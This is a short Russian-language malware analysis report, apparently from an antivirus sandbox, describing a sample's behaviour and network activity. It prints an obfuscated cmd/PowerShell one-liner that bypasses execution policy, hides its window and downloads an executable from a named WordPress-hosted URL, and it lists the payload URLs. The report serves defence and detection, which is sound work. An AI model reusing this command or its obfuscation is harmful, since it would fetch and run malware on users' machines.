Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://warnercamp.com/wp-includes/pkskkcin/nb0o37bw.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "powers^HeL^l^.Exe^ -^e^x^e^cutiO^N^polI^cY B^Y^PaS^s -no^pRo^FIle -^wiNDoW^S^TY^le^ ^hIddEn ^(^NEw-OBje^C^t ^sYs^tem.N^ET.we^Bcl^iE^n^T)^.dOWNLoa^D^FIle('http://warnercamp.com/wp...
Сетевая активность
Подключается к
- 'wa###rcamp.com':80
- 'wa###rcamp.com':443
TCP
Запросы HTTP GET
- http://wa###rcamp.com/wp-includes/PkSKKciN/nb0O37BW.exe
- http://www.wa###rcamp.com/wp-includes/PkSKKciN/nb0O37BW.exe
Другие
- 'wa###rcamp.com':443
UDP
- DNS ASK wa###rcamp.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "powers^HeL^l^.Exe^ -^e^x^e^cutiO^N^polI^cY B^Y^PaS^s -no^pRo^FIle -^wiNDoW^S^TY^le^ ^hIddEn ^(^NEw-OBje^C^t ^sYs^tem.N^ET.we^Bcl^iE^n^T)^.dOWNLoa^D^FIle('http://warnercamp.com/wp...' (со скрытым окном)
